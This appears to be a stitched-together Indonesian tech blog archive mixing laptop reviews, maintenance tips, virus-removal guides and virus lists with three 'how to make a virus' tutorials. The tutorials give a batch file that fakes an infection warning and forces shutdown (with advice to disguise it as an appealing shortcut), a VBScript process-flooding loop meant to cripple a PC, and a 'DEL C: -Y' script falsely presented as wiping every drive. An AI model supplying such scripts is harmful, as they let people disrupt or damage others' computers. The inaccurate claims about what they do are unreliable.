Latest Entries »

MEMBUAT VIRUS ( PALSU )

kamu copy dan paste script dibawah ini pada notepad

 

@echo off msg * WARNING !!! KOMPUTER ANDA TERINFEKSI VIRUS. MOHON SCAN KOMPUTER ANDA DENGAN ANTI VIRUS !!! shutdown -c “ERROR !!! VIRUS MENYEBAR KE SELURUH SYSTEM” -s -t 30

 

terus kamu save dengan nama virus.bat, atau apa saja yang penting akhirannya pake .bat sekarang kamu bisa coba klik dua kali pada file.bat yang telah kamu buat tadi, dan lihat apa yang akan terjadi. Keterangan : kamu bisa mengganti kata-katanya dengan apa yang kamu mau. angka 30 menunjukan waktu untuk shutdown atau komputer akan mati. untuk lebih menarik kamu buat schorcutnya dan pakai nama dan ikon yang menarik. *ini bukan virus tapi perintah untuk mematikan komputer.
Sekian info dari saya..

 

sumber: mamkus.com

Membuat virus bukanlah merupakan hal yang sulit. Karena, kita dapat membuatnya dengan notepad yang terdapat di semua komputer yang memakai Windows.
Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.

Let`s Begin!

langkah-langkah:

1. buka notepad
2. copy+paste bahasa pemograman(yang bercetak tebal) di bawah ini:

option explicit

dim wshshell
set wshshell=wscript.createobject(“wscript.shell”)

dim x
for x = 1 to 100000000
wshshell.run “tourstart.exe”
next

3. Save notepad dengan nama virus.vbs

 

Informasi tentang Toshiba Satellite M645-1018X adalah laptop terbaru 2011. Kami sedikit menginformasikan tentang Toshiba Satellite M645-1018X yang sekarang telah beredar ke seluruh belahan dunia. Untuk detailnya silahkan baca langsung artikel tentang Toshiba Satellite M645-1018X Spesifikasi Harga di bawah ini.

Toshiba Satellite M645-1018X
Toshiba Satellite M645-1018X

Harga Baru: Rp 12.101.700,00

Toshiba Satellite M645-1018X Specifications

Display

Display size 14 inches
Maximum resolution 1366 x 768
Display type Glossy LCD with LED Backlight

Processor

Processor class Intel Core i5
Processor model M450
Processor speed 2400 MHz

Graphics

Graphics Type Switchable
Integrated Graphics Chipset Intel
Integrated Graphics Chipset Model Number HD
Discreet Graphics Chipset Nvidia GeForce
Discreet Graphics Chipset Model Number 330M GT

Memory

Installed memory 4 GB

Storage

Hard Drive Type Hard Disk Drive
Total HD Size 500 GB
Number of hard drives included 1
Other Storage
  • Memory Stick
  • SD/MMC Card
  • SDHC Card
  • xD-Picture Card
Express Card Express Card 34

Optical Drives

Optical Drive Type DVD±R DL/DVD±RW/-RAM
Optical Drive Loading Type Slot

Networking

Ethernet Type 10/100/1000 Mbps
Wifi Type 802.11 n/b/g

Interface Connections

Number of USB 2 Ports 3
Video Interfaces
  • HDMI
  • VGA
Additional Interfaces eSATA

Dimensions

Weight (min) 5 pounds
Weight (with accessories) 5.9 lbs
Width 13.3 inches
Depth 9 inches
Height 1.5 inches

Software

Operating system Microsoft Windows 7 Home Premium
Included Software Adobe Reader 9; Microsoft Works 9; Toshiba: Recovery Disc Creator, DVD Player, Face Recognition, Web Camera Application, ReelTime;

Other Features

Built-In Speakers Stereo
Docking Station Port No
Devices
  • Backlit Keyboard
  • Built-In Microphone
  • Built-In Webcam
Input devices
  • Keyboard
  • Touchpad (multitouch)
Toshiba Satellite M645-1018X SpesifikasiToshiba Satellite M645-1018X Spesifikasi
Toshiba Satellite M645-1018X Terbaru 2011Toshiba Satellite M645-1018X Terbaru 2011
Toshiba Satellite M645-1018X HargaToshiba Satellite M645-1018X

Intulah seditit informasi teknologi tentang “Toshiba Satellite M645-1018X Spesifikasi Harga”semoga bermanfaat.

Saat ini flash disk merupakan sebuah tool yang sangat berarti bagi kita. Mungkin dapat dikatakan bahwa flash disk lebih penting dimiliki daripada komputer sendiri karena sekarang dimana-mana sudah banyak rental komputer yang dapat di sewa untuk digunakan per jamnya. Bahkan, seorang teman pernah mengatakan kepada saya bahwa flash disk adalah setengah dari otaknya. Mungkin kedengaran berlebihan bagi sebagian orang, namun begitulah pentingnya flash disk pada zaman seperti sekarang ini.
Disamping kegunaannya yang sangat berperan dalam dunia komputer, flash disk sangat rentan terhadap virus. Bahkan flash disk juga dapat dikatakan sebuah media yang sangat baik bagi penyebaran virus. Saat Anda memasukkan flash disk Anda ke komputer yang bervirus, biasanya secara otomatis virus akan masuk ke flash disk Anda dan Anda secara tidak langsung akan ikut berperan menyebarkan virus tadi saat Anda memasukkan flash disk tersebut ke komputer lain. Parahnya lagi apabila virus tersebut masih belum ada antivirusnya, membuat Anda harus repot menginstal ulang jika tidak bisa menghapusnya secara manual.
Pada artikel kali ini saya ingin berbagi beberapa trik yang biasa saya gunakan dalam menghindari virus dari flash disk masuk ke komputer saya. Silahkan simak triknya di bawah
# Matikan Autorun
Autorun merupakan trigger yang paling umum dalam penyebaran virus. Jika Anda pengguna windows XP, Anda dapat mematikannya dengan cara
1. klik start->run
2. masukkan perintah ‘gpedit.msc’
3.Pilih ‘Administrative Template’ di Computer Configuration
4. Lihat ke kolom sebelah kanan, kemudian double klik ‘system’
5. Double klik ‘Turn Off Autoplay’
6. Pilih opsi ‘enabled’
7. Kemudian OK
8. Restart komputer Anda.
# Tidak mengaktifkan hide file/folder dan hide protected operating system files.
Banyak virus yang tidak dapat terlihat pada komputer Anda karena settingan default di Windows adalah tidak menampilkan semua file yang hidden. Fungsinya adalah agar user tidak mendelete secara tidak segaja file-file system yang akan mempengaruhi kerja windows apabila di delete. Namun dengan cara ini virus dapat bersembunyi sehingga Anda tidak dapat mengetahui file virus ada pada flash disk Anda.
Asalkan Anda dapat berhati-hati, tidak masalah untuk menonaktifkan hide file/folder dan hide protected operating system files di komputer Anda. Caranya dengan :
1. Klik start -> my computer
2. Pada navigasi bagian atas klik ‘Tools’
3. Pilih opsi ‘Folder Options’
4. Klik ‘view’ pada navigasi di bagian atasnya.
5. Pilih opsi ‘show hidden files and folders’
6. Unchecklist ‘hide extentions for known types’ dan ‘hide protected operating system files (recommended)’
7. Klik OK. 

Quote: # Biasakan membuka folder flashdisk dengan cara klik kanan start -> explore all users dan membuka file dari navigasi root folder yang ada di sebelah kiri.

Hal ini di tujukan agar virus yang menyebar via autorun.ini tidak aktif saat Anda membuka isi flash disk. Curigai lah file-file aneh dalam flash disk Anda yang tidak lazim ada. Apalagi bila folder tersebut berada dalam posisi hidden. Bila Anda melihatnya lebih baik di delete saja
Demikianlah beberapa tips dari saya untuk menghindari virus dari flash disk menginfeksi komputer Anda.
Semoga dapat membantu.
Berikut ilustrasi gambar:
1. Langkah No: 2
[Image: Clipboard02.jpg]
2. Langkah No: 3
[Image: Clipboard01.jpg]
3. Langkah No: 6
[Image: Clipboard05.jpg]

Gan aku mau sharing nih tentang virus komputer.
tentang 10 top virus komputer terganas di dunia gan.
wah bahaya nih.
nih listnya:
1.Storm Worm
Muncul taon 2006, disebut “Storm Worm” karena nyebar via email dengan judul “230 dead as storm batters Europe”. Storm worm adalah program Trojan house. Beberapa versinya bisa buat komputer menjadi bots. Atau biasa digunakan hacker untuk spam mail melalui internet.
2. Leap-A/Oompa- A
Mac yang punya konsep security through obscurity yakin tidak akan terserang virus karena OS nya sistem tertutup. Tapi tahun 2006, virus Leap-A atau biasa disebut Oompa-A muncul. Nyebar lewat iChat pada Mac. Setelah Mac terserang, virus itu akan mencari kontak melalui iChat dan kirim pesan ke tiap kontak itu. Pesannya itu berisi file corrupt yang berbentuk JPEG. Memang tidak berbahaya, namun hal ini menyatakan bahwa masih mungkin akan ada virus berbahaya yang menyerang MAC.
3. Sasser and Netsky
Penciptanya anak Jerman umur 17 tahun, Sven Jaschan. Sasser nyerang Microsoft Windows. Sasser ini tidak nyebar via email. Tapi jika satu komputer koneksi ke komputer yang kena virus ini. Virus ini bikin komputer tidak bisa di-shutdown tanpa cabut power. Netsky nyebar melalui email dengan 22 Kb attachment file dan jaringan Windows. Bisa bikin serangan DoS. Sven Jaschan tidak dipenjara hanya diberi masa percobaan 1 tahunn 9 bulan, karena umurnya masih di bawah 18 taon.
4. MyDome (Novarg)
Mulai nyerang tanggal 1 Februari 2004, virus ini buat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS. Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara2 MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center.
5.SQL Slammer/Saphire
Muncul Januari 2003, nyebar cepat lewat internet. Waktu itu bikin layanan ATM Bank Amerika crash, ancurnya layanan 911 Seattle, dan Continental Airlines membatalkan beberapa penerbangan karena eror check in dan tiketing. Bikin rugi lebih dari $1 milliar sebelum dipacthed.
6.Nimda
Ini juga tahun 2001, kebalikan dari kata “admiN”. Penyebarannya sangat cepat, menurut TruSecure CTO Peter Tippet, Nimda hanya butuh 22 menit buat menjadi Top Ten saat itu. Target nya server2 Internet, menyebar lewat Internet. Nimda akan membuat backdoor ke OS. Jadi penyerang bisa akses ke server dan berbuat apa saja Nimda juga menjadi DDoS.
7.Code Red & Code Red II
Muncul musim panas 2001, menyerang OS Windows 2000 & NT. Virusnya bakal bikin buffer penuh jadi menghabiskan memori. Paling seru waktu berhubungan dengan White House, semua komputer yang kena virus ini bakalan otomatis akses ke web server di White House barengan, jadi bikin overload, alias serangan DDoS. Akhirnya Microsoft rilis patchnya saat itu.
8.The Klez
Nongol tahun 2001, menyebar via email, replikasi trus kirim ke orang2 di address book. Bikin komputer tidak bisa beroperasi, bisa menghentikan program antivirus.
9.ILOVEYOU
Setelah “Melissa”, muncul dia dari Filipina, bentuknya worm, program standalone dapat me-replikasi sendiri. Menyebar via email, judulnya”surat cinta” dari pengagum rahasia . Original filenya LOVE-LETTER- FOR-YOU.TXT. vbs. VBS singkatan Visual Basic Scripting. Penciptanya adalah Onel de Guzman dari Filipina.
10.Melissa
Dibikin tahunn 1999 oleh David L Smith, basicnya Microsoft Word macro. Menyebar via email dengan dokumen “Here is that document you asked for, don’t show it to anybodey else.”. Kalau sampe dibuka, virus akan replikasi dan otomatis mengirim ke top 50 di address book email. Smith dipenjara 20 bulan ama denda $5000 dan melarang akses komputer tanpa pengawasan.

Di tengah persaingan ketat seperti sekarang, para produsen notebook semakin serius membuat produk yang unik dan beda. Hal ini pun dilakukan Toshiba saat merilis notebook multimedia terbaru mereka, Qosmio F50. Notebook 15,4” ini tampil kemilau berkat desain Vibe dan penggunaan bahan plastik yang mengilap. Ini membuat penampilan Qosmio F50 terlihat sangat berkelas, meski sayangnya harus dikompensasi dengan mudahnya jejak jari tertinggal.

Namun yang paling unik dari Qosmio F50 ini adalah keberadaan sebuah prosesor yang disebut Quad Core HD Chip. Prosesor ini memiliki tugas khusus untuk membantu prosesor utama dalam menjalankan beberapa aplikasi multimedia. Contohnya melakukan upscaling (menaikkan resolusi) sehingga film berformat DVD bisa ditampilkan dengan kualitas sekelas film High Definition. Prosesor ini juga bisa digunakan untuk aplikasi gesture control; maksudnya kita bisa mengontrol notebook ini dengan gerakan tangan saja.

Sayangnya, konsep yang di atas kertas menarik itu, dalam kenyataannya tidaklah tampil sempurna. Ketika kami coba memutar film Batman: The Dark Knight, perbaikan kualitas yang dihasilkan tidaklah signifikan. Bahkan, di beberapa adegan, video yang ditampilkan justru terlihat pecah dan aneh.

Aplikasi gesture control juga tidak berjalan lancar. Teorinya, kita bisa melambaikan tangan untuk menjalankan video atau menegakkan telapak tangan (seperti memberi tanda stop) untuk melakukan pause. Namun ketika kami coba, gerakan tangan kami sering kali tidak tertangkap Webcam. Jadi daripada repot, kami kembali ke cara lama: menggunakan panel control di atas keyboard atau memanfaatkan remote control yang sudah disediakan sebagai kelengkapan standar.

Quad Core HD Chip sendiri tidak banyak berperan pada aplikasi standar — dan memang tidak perlu. Kombinasi prosesor Intel Core 2 Duo T9400, memori 3GB, dan kartu grafis GeForce 9600GT sudah lebih dari cukup menjalankan aplikasi standar maupun gaming. Jika dibandingkan semua notebook yang pernah kami uji, hanya Asus G50V dan yang bisa mengalahkan performa notebook ini. Namun performa yang garang itu harus dikompensasi dengan kebutuhan daya yang tinggi. Ini terlihat dari daya tahan baterenya saat memutar film HD yang cuma sekitar 1 jam.

Dari sisi fasilitas, notebook seharga US$ 2000 ini juga tampil sangat impresif. Selain konektor standar seperti USB dan FireWire, notebook ini juga dilengkapi koneksi eSATA dan HDMI. Sejalan dengan peruntukannya sebagai notebook multimedia, Qosmio F50 dilengkapi speaker dari pabrikan terkenal, harman/kardon. Tidak tanggung-tanggung, empat reflex speaker dan subwoofer ditanamkan di notebook ini, membuat kualitas suaranya begitu memukau. Boleh dibilang, inilah notebook dengan kualitas terbaik yang pernah kami uji.

Kalaupun ada keluhan adalah perangkat optiknya yang cuma DVD Writer, mungkin karena Toshiba pede prosesor Quad Core HD Chip akan membuat film kelas DVD akan di-upscale dengan sempurna.

***

Di atas kertas, keberadaan Quad Core HD Chip sebenarnya akan memberikan manfaat ekstra pada Qosmio F50 ini. Sayangnya, hal tersebut tidak berjalan sempurna, sehingga kami tidak merasakan manfaat dari prosesor tersebut — yang pastinya menambah harga notebook ini. Untungnya, performa dan fasilitas yang tertanam di notebook ini di atas rata-rata, sehingga sepadan dengan harganya yang mencapai US$ 2000.

Sumber: InfoKomputer

PLUS: Performa bagus; dilengkapi HDMI, eSATA, dan harddisk 400GB; kualitas speaker sempurna.

MINUS: Boros daya; mahal; cuma DVD Writer.

SKOR PENILAIAN
(maksimal 5)
Kinerja : 4
Fasilitas : 4,3
Penggunaan : 4,4
Harga : 3
SKOR TOTAL : 4

HASIL PENGUJIAN
Dari semua notebook yang pernah kami uji, Qosmio F50 menempati urutan kedua di bawah Asus G50V. Saingan terdekatnya adalah BenQ S42-LE04 yang sebenarnya unggul pada pengujian berbasis grafis, namun tertinggal cukup jauh pada aplikasi berbasis prosesor. Sayangnya Qosmio F50 sangat boros listrik, sehingga hanya bisa bertahan sekitar 1 jam saat memutar HD video.

 

Pengujian

(OS: WinVista)
Toshiba Qosmio F50

(Intel T9400, memori 3GB DDR2-800MHz, VGA nVidia 9600M 512MB, 15,4”)
BenQ S42-LE04

(Intel P8400, memori 1GB DDR2-667MHz, VGA nVidia GF9600M GT 256MB, 14,1”)

Cinebench R10
5139
4648
PCMark Vantage
3253
2907
Encoding video
12 menit 53 detik
16 menit 9 detik
Encoding audio
2 menit 38 detik
3 menit 5 detik
3DMark 2006
4480
5619
Daya Tahan Batere
Memutar HD Video
1 jam 5 menit
1 jam 33 menit
Battery Eater
54 menit
1 jam 18 menit

SPESIFIKASI Toshiba Qosmio F50
Prosesor: Intel Core 2 Duo T9400 (2,53GHz, cache 6MB, FSB 1066MHz)
RAM: 3GB DDR2-800
Chipset: Intel PM45
Kartu Grafis: nVidia GeForce 9600M GT 512MB
Harddisk: Fujitsu 400GB, SATA, 4200rpm
Optical drive: DVD Writer
Fasilitas: Wi-Fi G, Bluetooth, FireWire, LAN, USB (3x), kamera, card reader, Express Card, HDMI, eSATA
Layar: 15,4”, 1280×800 pixel
Kartu suara: Realtek ALC272
Sistem Operasi: Windows Vista Home Premium
Batere: 4000 mAh
Dimensi: 36,8×27,9x(4-5,4) cm
Bobot: 3,32 kg

Cara Merawat Laptop Yang Baik

Bagi yang memiliki sebuah laptop, tentu saja akan berbeda cara merawatnya dengan sebuah PC biasa. Secara umum, merawat software sama saja, namun untuk fisiknya perlu penanganan khusus. Ini sangat beralasan, karena perbedaan nyata ada di fisik laptop yang mendukung fungsi mobile. Laptop memiliki dimensi lebih kecil serta arstitektur yang lebih rentan.

Banyak dari kita yang mungkin hanya bisa mengoperasikan laptop tapi kurang mengetahui bagaimana agar laptop bisa terawat dengan baik dan berumur panjang.
Berikut beberapa tips merawat laptop yang bisa Anda praktekkan

1. Membersihkan “Keyboard”
Keyboar laptop gampang sekali kotor, entah karena jari tangan yang berminyak, abu rokok, remah-remah roti, atau debu. Ambil kuas dan sapukan ke sela-sela tombol untuk mengeluarkan kotoran, atau gunakan vacuum cleaner portabel untuk menyedot debu yang ada. Bersihkan permukaan tombol kibor dengan kain yang dibasahi cairan pembersih kaca. Gunakan proteksi pelindung kibor untuk mencegah kotoran.

2. Mengelap Layar
Jangan sembarangan menggunakan cairan pembersih pada layar, pakailah pembersih kaca. Semprotkan pada kain halus atau katun, lalu poles layar monitor. Jangan menyemprotkan langsung pada layar, karena bisa menyebabkan pemukaan LCD (Liquid Crystal Display) menjadi belang. Bersihkan secara searah, misalnya dari atas ke bawah atau dari kiri ke kanan, serta jangan menekannya terlalu keras.

3. Hindari Panas Matahari
Jangan meninggalkan notebook di dalam mobil yang diparkir di bawah sinar matahari. Panas yang berlebihan di dalam mobil bisa menyebabkan kerusakan komponen-komponen notebook.

4. Menghindari Goresan
Amankan benda-benda tajam dari sekitar notebook. Taruh lapisan pelindung di atas kibor sebelum Anda menutup case, agar layar tak tergores. Apabila Anda hendak bepergian, masukkan notebook pada wadah/tas yang telah tersedia.

5. Case Cemerlang
Tangan yang kotor dan berminyak juga menjadi penyebab case tidak lagi mengilat. Pakai deterjen nonzat alkalin dicampur air untuk membersihkannya. Bisa pula dengan pembersih multiguna untuk peranti elektronik, yang biasanya berupa busa. Semprotkan pada kain lap lembut, lalu gosok secara perlahan permukaan case.

6. Menyimpan notebook
Bila Anda akan menyimpan notebook dalam waktu lama, sebaiknya lepaskan baterai dan simpan dalam tempat yang sejuk dan kering, serta bersirkulasi udara cukup baik. Taruh silikon gel untuk menghindari jamur. Begitu ingin menggunakannya kembali, setrum baterai dengan cara mengisi dan mengosongkan sepenuhnya sebanyak tiga kali berturut-turut.

7. Hindari Medan Magnet
Untuk melindungi data yang ada di dalam hard disk, jangan letakkan peranti yang mengandung medan magnet/elektromagnet kuat di sekitar notebook. Peranti-peranti penghasil medan magnet, misalnya, spiker yang tidak berpelindung (unshielded speaker system) atau telepon selular. Sekiranya Anda ingin mengakses Internet menggunakan fasilitas infrared pada ponsel, letakkan ponsel dalam jarak sekitar 15 cm dari notebook.

8. Jangan Menggunakan Laptop di atas tempat tidur
Laptop memiliki sirkulasi pertukan udara diberbagai bagian bodynya. Sebagian ada yang berada di bagian bawah. Ketika kita meletakkan di alas yang lembut seperti tempat tidur, sofa dsb, bagian sirkulasi bawah akan tersumbat. Tentu saja ini tidak baik untuk kelangsungan kerja ketika sedang berjalan maupun umur laptop anda.

Pernah kena virus RECYCLER?
Tiba-tiba komputer jadi lemot?

Ini dia cara ngilangin manual, tanpa antivirus.
Loh, kok ga pake antivirus?
Na, silakan baca penjelasan berikut.

Bagaimana virus menginfeksi
—————————
Paling umum adalah dari removable media seperti flash disk. Saat kita dobel-klik flash disk yang terinfeksi, kita secara tidak sadar menjalankan autorun.inf milik sang virus.
Ini adalah contoh trik “social engineering“-nya para pembuat virus, yaitu memanfaatkan kebiasaan dan ketidaktelitian pengguna.

Repotnya, dengan men dobel-klik tersebut, pengguna mamberi wewenang pada windows untuk melakukan batch operation, yang perintah-perintah nya seakan-akan “tidak membahayakan” sistem, sehingga sangat sering virus autorun / double-klick mem-bypass antivirus.
Karena dianggap bukan virus, saat kita lakukan scan virus, maka hasilnya akan negatif. Ataupun jika ketemu belum tentu bisa menghapus, karena itu, diperlukan cara manual untuk menghilangkannya.

Apa yang dia (virus) lakukan?
——————–

  • Saat running dia akan membuat file autorun.inf di drive yang aktif
  • Virus tersebut akan menyalin file “boot.com” ke folder-folder system
  • Melakukan penambahan entry pada registry

Cara manghilangkan virus recycler:
———————————

    1. Restart komputer
    2. Masuk safe mode (tekan F8 saat booting, pilih safe mode)
    3. Buka explorer

Penting: selama proses JANGAN membuka drive/folder dengan dobel-klik

    1. Masuk menu Tools –> folder Options… –> View
    2. Pilih “Show hidden files and folders”
    3. Hilangkan centang pada pilihan berikut:

–> * Hide extensions for known file types –> * Hide protected operating system files

    1. Dengan menggunakan explorer tree, temukan dan hapus file “autorun.inf”
    2. Lakukan langkah 07 pada semua drive, bisa manggunakan search, tapi hati-hati, ada file autorun yang memang diperlukan.
    3. Periksa folder-2:

–> c:\windows\system32\dllcache –> c:\windows\prefetch cari file “boot.com”, jika ketemu, hapus

    1. Buka folder-2:

–> c:\windows\temp –> c:\Documents and Settings\[USER PROFILE]\Local Settings\Temp hapus semua isinya, ada beberapa file yang menolak dihapus, biarkan saja

  1. Jalankan REGEDIT
  2. Pilih File –> search
  3. Cari entry “boot.com”, jika ketemu hapus. Tekan F3 untuk mengulang pencarian sampai akhir registry
  4. Kembali pada entry pertama, lakukan seperti langkah 13 untuk entry “recycler”
  5. Tutup semua aplikasi, restart komputer
  6. Buka explorer, cari dan hapus semua folder “recycler”
  7. Untuk jaga-jaga lakukan kembali langkah 07 dan 08

— Selamat, kompi anda sudah bebas dari virus recycler —

TIPS:
– Jangan buka flash disk / drive dengan double-click, pake explorer tree saja
– Gunakan opsi show hidden files pada folder options
– Gunakan opsi show extention pada folder options
– Waspada jika ada nama file / folder berganda
– Waspada jika file kerja anda berekstensi .com atau .exe
– Jangan klik file yang tiba-tiba muncul / tidak pernah anda bikin, apalagi kalo namanya aneh-aneh
– Gunakan antivirus, lakukan update rutin
– Selalu hati-2 dan teliti, terutama waktu lagi buru-buru

Semoga dapat berguna bagi mereka yang kena virus ini dan udah nyerah sampe mau install ulang.

Virus Komputer Terbaru

Berikut ini contoh-contoh virus komputer terbaru 2010 yang paling berbahaya menurut forumkami.com, hati-hati.. virus komputer selalu mengintai PC Anda, lakukan tindakan pencegahan sebelum terlambat.. ^_^. Serangan virus jenis VBScript masih sangat tinggi, ini terbukti dari banyaknya laporan yang mengeluhkan perihal virus jenis script ini. Satu virus yang melesat tinggi ke urutan pertama adalah Discusx.vbs. Bila Anda masih ingat dengan virus ini, di Virus Top-10 edisi Maret 2008 yang lalu, virus Discusx.vbs berada di urutan 5, namun kali ini dia melesat naik ke urutan pertama. Berikut daftar selengkapnya virus komputer terbaru yang paling berbahaya:

1. Discusx.vbs
Virus VBScript yang satu ini, memiliki ukuran sekitar 4.800 bytes. Dia akan mencoba menginfeksi di beberapa drive di komputer Anda, termasuk drive flash disk, yang jika terinfeksi akan membuat file autorun.inf dan System32.sys.vbs pada root drive tersebut. Selain itu, ia pun akan mengubah caption dari Internet Explorer menjadi “.:iscus-X SAY MET LEBARAN! [HAPPY LEBARAN ?!]::.”.

2. Reva.vbs
Lagi, virus jenis VBScript yang lumayan banyak dikeluhkan oleh beberapa pembaca. Ia akan mencoba menyebarkan dirinya ke setiap drive di komputer Anda termasuk drive flash disk. Pada drive terinfeksi akan terdapat file reva.vbs, autorun.inf, dan shaheedan.jpg. Selain itu, ia pun akan mengubah halaman default dari Internet Explorer agar mengarah ke situs lain.

3. XFly
PC Media Antivirus mengenali dua varian dari virus ini, yakni XFly.A dan XFly.B. Sama seperti kebanyakan virus lokal lainnya, ia dibuat menggunakan Visual Basic. Memiliki ukuran tubuh sebesar 143.360 bytes tanpa di-compress. Dan ia dapat menyamar sebagai folder, file MP3 WinAmp atau yang lainnya dengan cara mengubah secara langsung resource icon yang ada pada tubuhnya. Ini akan lebih mempersulit user awam dalam mengenalinya. Pada komputer terinfeksi, saat menjalankan Internet Explorer, caption-nya akan berubah menjadi “..:: x-fly ::..”, dan saat memulai Windows pun akan muncul pesan dari si pembuat virus pada default browser. Atau setiap waktu menunjukan pukul 12:30, 16:00, atau 20:00, virus ini pun akan menampilkan layar hitam yang juga berisi pesan dari si pembuat virus.

4. Explorea
Virus yang di-compile menggunakan Visual Basic ini hadir dengan ukuran sekitar 167.936 bytes, tanpa di-compress. Menggunakan icon mirip folder standar Windows untuk mengelabui korbannya. Virus ini akan menyerang Registry Windows Anda dengan mengubah default open dari beberapa extension seperti .LNK, .PIF, .BAT, dan .COM. Pada komputer terinfeksi, disaat-saat tertentu terkadang muncul pesan error, contohnya pada saat membuka System Properties.

5. Gen.FFE
Gen.FFE atau pembuatnya menamakan Fast Firus Engine merupakan salah satu program Virus Generator buatan lokal. Dengan hanya menggunakan program ini, tidak dibutuhkan waktu lama untuk dapat menciptakan virus/varian baru. Virus hasil keluaran program ini menggunakan icon mirip gambar folder standar bawaan Windows. Ia pun akan memblokir akses ke Task Manager, Command Prompt, serta menghilangkan beberapa menu di Start Menu. Ia juga akan membaca caption dari program yang aktif, apabila terdapat string yang berhubungan dengan antivirus maka program tersebut akan segera ditutup olehnya.

6. Hampa
Virus yang juga dibuat menggunakan Visual Basic dan ber-icon-kan folder ini memiliki ukuran tubuh sekitar 110.592 bytes, tanpa di-compress. Banyak sekali perubahan yang ia buat pada Windows, seperti Registry, File System, dan lain sebagainya, yang bahkan dapat menyebabkan Windows tidak dapat digunakan sebagaimana mestinya. Pada komputer yang terinfeksi oleh virus ini, saat memulai Windows akan muncul pesan dari si pembuat virus.

7. Raider.vbs
Virus jenis VBScript ini berukuran sekitar 10.000 bytes, jika file virus dibuka dengan Notepad misalnya, maka tidak banyak string yang bisa dibaca karena dalam kondisi ter-enkripsi. Pada Registry, ia pun memberikan pengenal dengan membuat key baru di HKLM\Software dengan nama sama seperti nama pada computer name, dengan isinya berupa string value seperti nama virus tersebut, Raider, serta tanggal komputer tersebut kali pertama terinfeksi.

8. ForrisWaitme
Virus yang dibuat dengan Visual Basic ini menggunakan icon mirip folder standar Windows untuk melakukan penyamarannya. Beberapa ulahnya adalah menukar fungsi tombol mouse kiri dengan kanan, menghilangkan menu Folder Options, membuat file pesan “baca saya.txt” pada drive terinfeksi, dan masih ada yang lainnya.

9. Pray
Virus lokal ini dibuat menggunakan Visual Basic. Kami mendapati 2 varian dari virus ini, untuk varian Pray.A tidak memiliki icon, sementara untuk varian Pray.B menggunakan icon mirip Windows Explorer. Jika komputer terinfeksi oleh virus ini, saat penunjuk waktu di komputer tersebut menunjukan pukul 05:15, 13:00, 16:00, 18:30, dan atau 19:45, virus ini akan menampilkan pesan yang mengingatkan user untuk melakukan shalat.

10. Rian.vbs
Virus VBScript ini memiliki ukuran 3788 bytes. Saat menginfeksi, ia akan menciptakan file baru autorun.inf dan RiaN.dll.vbs pada setiap root drive yang terpasang di komputer korban, termasuk Flash Disk. Komputer yang terinfeksi oleh virus ini, caption dari Internet Explorer akan berubah menjadi “Rian P2 Humas Cantiq.

Virus yang akan kita praketkkan ini adalah virus yang jauh lebih mematikan daripada virus-virus lainnya. Anda akan kaget dengan kegunaannya sebagai virus.

Let`s Begin!1. buka notepad anda.
2. copy paste tulisan dibaah ini:

@echo off
DEL C: -Y
DEL D: -Y
3. ubah “type as file” ke “all files” dan save notepad dengan nama virus mematikan.bat
4. JANGAN DIKLIK!!!

Virus ini adalah virus yang sangat mematikan, bila anda mengklik virus ini, maka seluruh data yang ada di hardisk anda akan hilang tanpa terkecuali. Jadi, kesimpulannya….. Komputer anda akan mati total!!